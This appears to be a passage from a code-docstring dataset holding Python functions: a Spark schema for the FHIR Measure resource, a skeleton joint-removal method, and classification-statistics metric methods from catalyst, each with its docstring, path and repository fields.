measure is used to examine a process, an outcome over\n time, a patient-reported outcome, or a structure measure such as utilization.\n\n riskAdjustment: A description of the risk adjustment factors that may impact the resulting\n score for the measure and how they may be accounted for when computing and\n reporting measure results.\n\n rateAggregation: Describes how to combine the information calculated, based on logic in each of\n several populations, into one summarized result.\n\n rationale: Provides a succint statement of the need for the measure. Usually includes\n statements pertaining to importance criterion: impact, gap in care, and\n evidence.\n\n clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical\n recommendations supporting the measure.\n\n improvementNotation: Information on whether an increase or decrease in score is the preferred\n result (e.g., a higher score indicates better quality OR a lower score\n indicates better quality OR quality is whthin a range).\n\n definition: Provides a description of an individual term used within the measure.\n\n guidance: Additional guidance for the measure including how it can be used in a clinical\n context, and the intent of the measure.\n\n set: The measure set, e.g. Preventive Care and Screening.\n\n group: A group of population criteria for the measure.\n\n supplementalData: The supplemental data criteria for the measure report, specified as either the\n name of a valid CQL expression within a referenced library, or a valid FHIR\n Resource Path.\n\n ' from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema from spark_fhir_schemas.stu3.complex_types.period import PeriodSchema from spark_fhir_schemas.stu3.complex_types.usagecontext import UsageContextSchema from spark_fhir_schemas.stu3.complex_types.codeableconcept import CodeableConceptSchema from spark_fhir_schemas.stu3.complex_types.contributor import ContributorSchema from spark_fhir_schemas.stu3.complex_types.contactdetail import ContactDetailSchema from spark_fhir_schemas.stu3.complex_types.relatedartifact import RelatedArtifactSchema from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema from spark_fhir_schemas.stu3.complex_types.measure_group import Measure_GroupSchema from spark_fhir_schemas.stu3.complex_types.measure_supplementaldata import Measure_SupplementalDataSchema if ((max_recursion_limit and (nesting_list.count('Measure') >= max_recursion_limit)) or (max_nesting_depth and (nesting_depth >= max_nesting_depth))): return StructType([StructField('id', StringType(), True)]) my_nesting_list: List[str] = (nesting_list + ['Measure']) schema = StructType([StructField('id', StringType(), True), StructField('extension', ArrayType(ExtensionSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('meta', MetaSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('implicitRules', StringType(), True), StructField('language', StringType(), True), StructField('text', NarrativeSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('contained', ArrayType(ResourceListSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('resourceType', StringType(), True), StructField('url', StringType(), True), StructField('identifier', ArrayType(IdentifierSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('version', StringType(), True), StructField('name', StringType(), True), StructField('title', StringType(), True), StructField('status', StringType(), True), StructField('experimental', BooleanType(), True), StructField('date', StringType(), True), StructField('publisher', StringType(), True), StructField('description', StringType(), True), StructField('purpose', StringType(), True), StructField('usage', StringType(), True), StructField('approvalDate', DateType(), True), StructField('lastReviewDate', DateType(), True), StructField('effectivePeriod', PeriodSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('useContext', ArrayType(UsageContextSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('jurisdiction', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('topic', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contributor', ArrayType(ContributorSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contact', ArrayType(ContactDetailSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('copyright', StringType(), True), StructField('relatedArtifact', ArrayType(RelatedArtifactSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('library', ArrayType(ReferenceSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('disclaimer', StringType(), True), StructField('scoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('compositeScoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('type', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('riskAdjustment', StringType(), True), StructField('rateAggregation', StringType(), True), StructField('rationale', StringType(), True), StructField('clinicalRecommendationStatement', StringType(), True), StructField('improvementNotation', StringType(), True), StructField('definition', ArrayType(StringType()), True), StructField('guidance', StringType(), True), StructField('set', StringType(), True), StructField('group', ArrayType(Measure_GroupSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('supplementalData', ArrayType(Measure_SupplementalDataSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True)]) if (not include_extension): schema.fields = [(c if (c.name != 'extension') else StructField('extension', StringType(), True)) for c in schema.fields] return schema<|docstring|>The Measure resource provides the definition of a quality measure. id: The logical id of the resource, as used in the URL for the resource. Once assigned, this value never changes. extension: May be used to represent additional information that is not part of the basic definition of the resource. In order to make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer is allowed to define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. meta: The metadata about the resource. This is content that is maintained by the infrastructure. Changes to the content may not always be associated with version changes to the resource. implicitRules: A reference to a set of rules that were followed when the resource was constructed, and which must be understood when processing the content. language: The base language in which the resource is written. text: A human-readable narrative that contains a summary of the resource, and may be used to represent the content of the resource to a human. The narrative need not encode all the structured data, but is required to contain sufficient detail to make it "clinically safe" for a human to just read the narrative. Resource definitions may define what content should be represented in the narrative to ensure clinical safety. contained: These resources do not have an independent existence apart from the resource that contains them - they cannot be identified independently, and nor can they have their own independent transaction scope. resourceType: This is a Measure resource url: An absolute URI that is used to identify this measure when it is referenced in a specification, model, design or an instance. This SHALL be a URL, SHOULD be globally unique, and SHOULD be an address at which this measure is (or will be) published. The URL SHOULD include the major version of the measure. For more information see [Technical and Business Versions](resource.html#versions). identifier: A formal identifier that is used to identify this measure when it is represented in other formats, or referenced in a specification, model, design or an instance. version: The identifier that is used to identify this version of the measure when it is referenced in a specification, model, design or instance. This is an arbitrary value managed by the measure author and is not expected to be globally unique. For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is not available. There is also no expectation that versions can be placed in a lexicographical sequence. To provide a version consistent with the Decision Support Service specification, use the format Major.Minor.Revision (e.g. 1.0.0). For more information on versioning knowledge assets, refer to the Decision Support Service specification. Note that a version is required for non-experimental active artifacts. name: A natural language name identifying the measure. This name should be usable as an identifier for the module by machine processing applications such as code generation. title: A short, descriptive, user-friendly title for the measure. status: The status of this measure. Enables tracking the life-cycle of the content. experimental: A boolean value to indicate that this measure is authored for testing purposes (or education/evaluation/marketing), and is not intended to be used for genuine usage. date: The date (and optionally time) when the measure was published. The date must change if and when the business version changes and it must change if the status code changes. In addition, it should change when the substantive content of the measure changes. publisher: The name of the individual or organization that published the measure. description: A free text natural language description of the measure from a consumer's perspective. purpose: Explaination of why this measure is needed and why it has been designed as it has. usage: A detailed description of how the measure is used from a clinical perspective. approvalDate: The date on which the resource content was approved by the publisher. Approval happens once when the content is officially approved for usage. lastReviewDate: The date on which the resource content was last reviewed. Review happens periodically after approval, but doesn't change the original approval date. effectivePeriod: The period during which the measure content was or is planned to be in active use. useContext: The content was developed with a focus and intent of supporting the contexts that are listed. These terms may be used to assist with indexing and searching for appropriate measure instances. jurisdiction: A legal or geographic region in which the measure is intended to be used. topic: Descriptive topics related to the content of the measure. Topics provide a high-level categorization of the type of the measure that can be useful for filtering and searching. contributor: A contributor to the content of the measure, including authors, editors, reviewers, and endorsers. contact: Contact details to assist a user in finding and communicating with the publisher. copyright: A copyright statement relating to the measure and/or its contents. Copyright statements are generally legal restrictions on the use and publishing of the measure. relatedArtifact: Related artifacts such as additional documentation, justification, or bibliographic references. library: A reference to a Library resource containing the formal logic used by the measure. disclaimer: Notices and disclaimers regarding the use of the measure, or related to intellectual property (such as code systems) referenced by the measure. scoring: Indicates how the calculation is performed for the measure, including proportion, ratio, continuous variable, and cohort. The value set is extensible, allowing additional measure scoring types to be represented. compositeScoring: If this is a composite measure, the scoring method used to combine the component measures to determine the composite score. type: Indicates whether the measure is used to examine a process, an outcome over time, a patient-reported outcome, or a structure measure such as utilization. riskAdjustment: A description of the risk adjustment factors that may impact the resulting score for the measure and how they may be accounted for when computing and reporting measure results. rateAggregation: Describes how to combine the information calculated, based on logic in each of several populations, into one summarized result. rationale: Provides a succint statement of the need for the measure. Usually includes statements pertaining to importance criterion: impact, gap in care, and evidence. clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical recommendations supporting the measure. improvementNotation: Information on whether an increase or decrease in score is the preferred result (e.g., a higher score indicates better quality OR a lower score indicates better quality OR quality is whthin a range). definition: Provides a description of an individual term used within the measure. guidance: Additional guidance for the measure including how it can be used in a clinical context, and the intent of the measure. set: The measure set, e.g. Preventive Care and Screening. group: A group of population criteria for the measure. supplementalData: The supplemental data criteria for the measure report, specified as either the name of a valid CQL expression within a referenced library, or a valid FHIR Resource Path.<|endoftext|>
e6bfd2aa7707cd9ee08e65aaac2c11c44de37c066f00f85d32c711e7a40150cc
def remove_joints(self, joints_to_remove): "\n Remove the joints specified in 'joints_to_remove'.\n " valid_joints = [] for joint in range(len(self._parents)): if (joint not in joints_to_remove): valid_joints.append(joint) for i in range(len(self._parents)): while (self._parents[i] in joints_to_remove): self._parents[i] = self._parents[self._parents[i]] index_offsets = np.zeros(len(self._parents), dtype=int) new_parents = [] for (i, parent) in enumerate(self._parents): if (i not in joints_to_remove): new_parents.append((parent - index_offsets[parent])) else: index_offsets[i:] += 1 self._parents = np.array(new_parents) if (self._joints_left is not None): new_joints_left = [] for joint in self._joints_left: if (joint in valid_joints): new_joints_left.append((joint - index_offsets[joint])) self._joints_left = new_joints_left if (self._joints_right is not None): new_joints_right = [] for joint in self._joints_right: if (joint in valid_joints): new_joints_right.append((joint - index_offsets[joint])) self._joints_right = new_joints_right self._compute_metadata() return valid_joints
Remove the joints specified in 'joints_to_remove'.
common/skeleton.py
remove_joints
fsImageries/video-to-pose3D
574
python
def remove_joints(self, joints_to_remove): "\n \n " valid_joints = [] for joint in range(len(self._parents)): if (joint not in joints_to_remove): valid_joints.append(joint) for i in range(len(self._parents)): while (self._parents[i] in joints_to_remove): self._parents[i] = self._parents[self._parents[i]] index_offsets = np.zeros(len(self._parents), dtype=int) new_parents = [] for (i, parent) in enumerate(self._parents): if (i not in joints_to_remove): new_parents.append((parent - index_offsets[parent])) else: index_offsets[i:] += 1 self._parents = np.array(new_parents) if (self._joints_left is not None): new_joints_left = [] for joint in self._joints_left: if (joint in valid_joints): new_joints_left.append((joint - index_offsets[joint])) self._joints_left = new_joints_left if (self._joints_right is not None): new_joints_right = [] for joint in self._joints_right: if (joint in valid_joints): new_joints_right.append((joint - index_offsets[joint])) self._joints_right = new_joints_right self._compute_metadata() return valid_joints
def remove_joints(self, joints_to_remove): "\n \n " valid_joints = [] for joint in range(len(self._parents)): if (joint not in joints_to_remove): valid_joints.append(joint) for i in range(len(self._parents)): while (self._parents[i] in joints_to_remove): self._parents[i] = self._parents[self._parents[i]] index_offsets = np.zeros(len(self._parents), dtype=int) new_parents = [] for (i, parent) in enumerate(self._parents): if (i not in joints_to_remove): new_parents.append((parent - index_offsets[parent])) else: index_offsets[i:] += 1 self._parents = np.array(new_parents) if (self._joints_left is not None): new_joints_left = [] for joint in self._joints_left: if (joint in valid_joints): new_joints_left.append((joint - index_offsets[joint])) self._joints_left = new_joints_left if (self._joints_right is not None): new_joints_right = [] for joint in self._joints_right: if (joint in valid_joints): new_joints_right.append((joint - index_offsets[joint])) self._joints_right = new_joints_right self._compute_metadata() return valid_joints<|docstring|>Remove the joints specified in 'joints_to_remove'.<|endoftext|>
d047aa01926c1c3745270ef7c52390cc56c7cb402c6cf054c9a0a85ff1817e24
def __init__(self, mode: str, num_classes: int=None, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init params\n\n Raises:\n ValueError: if mode is incorrect\n ' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) if (mode == 'binary'): self.statistics_fn = get_binary_statistics elif (mode == 'multiclass'): self.statistics_fn = partial(get_multiclass_statistics, num_classes=num_classes) elif (mode == 'multilabel'): self.statistics_fn = get_multilabel_statistics else: raise ValueError("Mode should be one of 'binary', 'multiclass', 'multilabel'") self.num_classes = num_classes self.statistics = None self._is_ddp = False self.reset()
Init params Raises: ValueError: if mode is incorrect
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, mode: str, num_classes: int=None, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init params\n\n Raises:\n ValueError: if mode is incorrect\n ' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) if (mode == 'binary'): self.statistics_fn = get_binary_statistics elif (mode == 'multiclass'): self.statistics_fn = partial(get_multiclass_statistics, num_classes=num_classes) elif (mode == 'multilabel'): self.statistics_fn = get_multilabel_statistics else: raise ValueError("Mode should be one of 'binary', 'multiclass', 'multilabel'") self.num_classes = num_classes self.statistics = None self._is_ddp = False self.reset()
def __init__(self, mode: str, num_classes: int=None, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init params\n\n Raises:\n ValueError: if mode is incorrect\n ' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) if (mode == 'binary'): self.statistics_fn = get_binary_statistics elif (mode == 'multiclass'): self.statistics_fn = partial(get_multiclass_statistics, num_classes=num_classes) elif (mode == 'multilabel'): self.statistics_fn = get_multilabel_statistics else: raise ValueError("Mode should be one of 'binary', 'multiclass', 'multilabel'") self.num_classes = num_classes self.statistics = None self._is_ddp = False self.reset()<|docstring|>Init params Raises: ValueError: if mode is incorrect<|endoftext|>
7b46a32be345e44faf0d1acf7929968c8d028ec441d219eaf542b2abfc189443
def reset(self) -> None: 'Reset all the statistics.' self.statistics = defaultdict(self._mp_hack) self._is_ddp = (get_rank() > (- 1))
Reset all the statistics.
catalyst/metrics/_classification.py
reset
ifixdocs/catalyst
1
python
def reset(self) -> None: self.statistics = defaultdict(self._mp_hack) self._is_ddp = (get_rank() > (- 1))
def reset(self) -> None: self.statistics = defaultdict(self._mp_hack) self._is_ddp = (get_rank() > (- 1))<|docstring|>Reset all the statistics.<|endoftext|>
564448435b1560ba8d1e023f7207ec550cbb5717b5ab9418cba21a8ef695bead
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Union[(Tuple[(int, int, int, int, int)], Tuple[(Any, Any, Any, Any, Any)])]: '\n Compute statistics from outputs and targets, update accumulated statistics with new values.\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n Tuple of int or array: true negative, false positive, false\n negative, true positive and support statistics\n ' (tn, fp, fn, tp, support) = self.statistics_fn(outputs=outputs.cpu().detach(), targets=targets.cpu().detach()) tn = tn.numpy() fp = fp.numpy() fn = fn.numpy() tp = tp.numpy() support = support.numpy() self.statistics['tn'] += tn self.statistics['fp'] += fp self.statistics['fn'] += fn self.statistics['tp'] += tp self.statistics['support'] += support return (tn, fp, fn, tp, support)
Compute statistics from outputs and targets, update accumulated statistics with new values. Args: outputs: prediction values targets: true answers Returns: Tuple of int or array: true negative, false positive, false negative, true positive and support statistics
catalyst/metrics/_classification.py
update
ifixdocs/catalyst
1
python
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Union[(Tuple[(int, int, int, int, int)], Tuple[(Any, Any, Any, Any, Any)])]: '\n Compute statistics from outputs and targets, update accumulated statistics with new values.\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n Tuple of int or array: true negative, false positive, false\n negative, true positive and support statistics\n ' (tn, fp, fn, tp, support) = self.statistics_fn(outputs=outputs.cpu().detach(), targets=targets.cpu().detach()) tn = tn.numpy() fp = fp.numpy() fn = fn.numpy() tp = tp.numpy() support = support.numpy() self.statistics['tn'] += tn self.statistics['fp'] += fp self.statistics['fn'] += fn self.statistics['tp'] += tp self.statistics['support'] += support return (tn, fp, fn, tp, support)
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Union[(Tuple[(int, int, int, int, int)], Tuple[(Any, Any, Any, Any, Any)])]: '\n Compute statistics from outputs and targets, update accumulated statistics with new values.\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n Tuple of int or array: true negative, false positive, false\n negative, true positive and support statistics\n ' (tn, fp, fn, tp, support) = self.statistics_fn(outputs=outputs.cpu().detach(), targets=targets.cpu().detach()) tn = tn.numpy() fp = fp.numpy() fn = fn.numpy() tp = tp.numpy() support = support.numpy() self.statistics['tn'] += tn self.statistics['fp'] += fp self.statistics['fn'] += fn self.statistics['tp'] += tp self.statistics['support'] += support return (tn, fp, fn, tp, support)<|docstring|>Compute statistics from outputs and targets, update accumulated statistics with new values. Args: outputs: prediction values targets: true answers Returns: Tuple of int or array: true negative, false positive, false negative, true positive and support statistics<|endoftext|>
7d9951f4261277d170d9d116cb06b224195a25f9fcc0eaba92fc9cb660e24c14
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return statistics intermediate result\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of statistics for current input\n ' (tn, fp, fn, tp, support) = self.update(outputs=outputs, targets=targets) return {'fn': fn, 'fp': fp, 'support': support, 'tn': tn, 'tp': tp}
Update statistics and return statistics intermediate result Args: outputs: prediction values targets: true answers Returns: dict of statistics for current input
catalyst/metrics/_classification.py
update_key_value
ifixdocs/catalyst
1
python
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return statistics intermediate result\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of statistics for current input\n ' (tn, fp, fn, tp, support) = self.update(outputs=outputs, targets=targets) return {'fn': fn, 'fp': fp, 'support': support, 'tn': tn, 'tp': tp}
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return statistics intermediate result\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of statistics for current input\n ' (tn, fp, fn, tp, support) = self.update(outputs=outputs, targets=targets) return {'fn': fn, 'fp': fp, 'support': support, 'tn': tn, 'tp': tp}<|docstring|>Update statistics and return statistics intermediate result Args: outputs: prediction values targets: true answers Returns: dict of statistics for current input<|endoftext|>
50e8463a0148b36f3be23ca9927b56a37837df69614e4b1d1fddb75dad8521bb
def compute(self) -> Dict[(str, Union[(int, np.array)])]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n ' return self.statistics
Return accumulated statistics Returns: dict of statistics
catalyst/metrics/_classification.py
compute
ifixdocs/catalyst
1
python
def compute(self) -> Dict[(str, Union[(int, np.array)])]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n ' return self.statistics
def compute(self) -> Dict[(str, Union[(int, np.array)])]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n ' return self.statistics<|docstring|>Return accumulated statistics Returns: dict of statistics<|endoftext|>
422f1842bd91686aae09c0a297dea9fc6762a0b72aec253d593c819895e59787
def compute_key_value(self) -> Dict[(str, float)]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n\n Examples:\n >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13}\n >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}\n ' result = self.compute() return {k: result[k] for k in sorted(result.keys())}
Return accumulated statistics Returns: dict of statistics Examples: >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13} >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}
catalyst/metrics/_classification.py
compute_key_value
ifixdocs/catalyst
1
python
def compute_key_value(self) -> Dict[(str, float)]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n\n Examples:\n >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13}\n >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}\n ' result = self.compute() return {k: result[k] for k in sorted(result.keys())}
def compute_key_value(self) -> Dict[(str, float)]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n\n Examples:\n >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13}\n >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}\n ' result = self.compute() return {k: result[k] for k in sorted(result.keys())}<|docstring|>Return accumulated statistics Returns: dict of statistics Examples: >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13} >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}<|endoftext|>
e40f39ae5802ff939bc67c88e399b88f659c025f41ceb66aff0b8c906dd415fb
def __init__(self, mode: str, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: str=None, suffix: str=None) -> None: 'Init PrecisionRecallF1SupportMetric instance' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, mode=mode) self.zero_division = zero_division self.reset()
Init PrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, mode: str, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: str=None, suffix: str=None) -> None: super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, mode=mode) self.zero_division = zero_division self.reset()
def __init__(self, mode: str, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: str=None, suffix: str=None) -> None: super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, mode=mode) self.zero_division = zero_division self.reset()<|docstring|>Init PrecisionRecallF1SupportMetric instance<|endoftext|>
7ca6b6365085c465ada420aaa1bd9c26c3813894117ad141d3130a39aa9eed98
def _convert_metrics_to_kv(self, per_class, micro, macro, weighted) -> Dict[(str, float)]: '\n Convert metrics aggregation to key-value format\n\n Args:\n per_class: per-class metrics, array of shape (4, self.num_classes)\n of precision, recall, f1 and support metrics\n micro: micro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n macro: macro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n weighted: weighted averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n\n Returns:\n dict of key-value metrics\n ' kv_metrics = {} for (aggregation_name, aggregated_metrics) in zip(('micro', 'macro', 'weighted'), (micro, macro, weighted)): metrics = {f'{metric_name}/{aggregation_name}': metric_value for (metric_name, metric_value) in zip(('precision', 'recall', 'f1'), aggregated_metrics[:(- 1)])} kv_metrics.update(metrics) per_class_metrics = {f'{metric_name}/class_{i:02d}': metric_value[i] for (metric_name, metric_value) in zip(('precision', 'recall', 'f1', 'support'), per_class) for i in range(self.num_classes)} kv_metrics.update(per_class_metrics) return kv_metrics
Convert metrics aggregation to key-value format Args: per_class: per-class metrics, array of shape (4, self.num_classes) of precision, recall, f1 and support metrics micro: micro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics macro: macro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics weighted: weighted averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics Returns: dict of key-value metrics
catalyst/metrics/_classification.py
_convert_metrics_to_kv
ifixdocs/catalyst
1
python
def _convert_metrics_to_kv(self, per_class, micro, macro, weighted) -> Dict[(str, float)]: '\n Convert metrics aggregation to key-value format\n\n Args:\n per_class: per-class metrics, array of shape (4, self.num_classes)\n of precision, recall, f1 and support metrics\n micro: micro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n macro: macro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n weighted: weighted averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n\n Returns:\n dict of key-value metrics\n ' kv_metrics = {} for (aggregation_name, aggregated_metrics) in zip(('micro', 'macro', 'weighted'), (micro, macro, weighted)): metrics = {f'{metric_name}/{aggregation_name}': metric_value for (metric_name, metric_value) in zip(('precision', 'recall', 'f1'), aggregated_metrics[:(- 1)])} kv_metrics.update(metrics) per_class_metrics = {f'{metric_name}/class_{i:02d}': metric_value[i] for (metric_name, metric_value) in zip(('precision', 'recall', 'f1', 'support'), per_class) for i in range(self.num_classes)} kv_metrics.update(per_class_metrics) return kv_metrics
def _convert_metrics_to_kv(self, per_class, micro, macro, weighted) -> Dict[(str, float)]: '\n Convert metrics aggregation to key-value format\n\n Args:\n per_class: per-class metrics, array of shape (4, self.num_classes)\n of precision, recall, f1 and support metrics\n micro: micro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n macro: macro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n weighted: weighted averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n\n Returns:\n dict of key-value metrics\n ' kv_metrics = {} for (aggregation_name, aggregated_metrics) in zip(('micro', 'macro', 'weighted'), (micro, macro, weighted)): metrics = {f'{metric_name}/{aggregation_name}': metric_value for (metric_name, metric_value) in zip(('precision', 'recall', 'f1'), aggregated_metrics[:(- 1)])} kv_metrics.update(metrics) per_class_metrics = {f'{metric_name}/class_{i:02d}': metric_value[i] for (metric_name, metric_value) in zip(('precision', 'recall', 'f1', 'support'), per_class) for i in range(self.num_classes)} kv_metrics.update(per_class_metrics) return kv_metrics<|docstring|>Convert metrics aggregation to key-value format Args: per_class: per-class metrics, array of shape (4, self.num_classes) of precision, recall, f1 and support metrics micro: micro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics macro: macro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics weighted: weighted averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics Returns: dict of key-value metrics<|endoftext|>
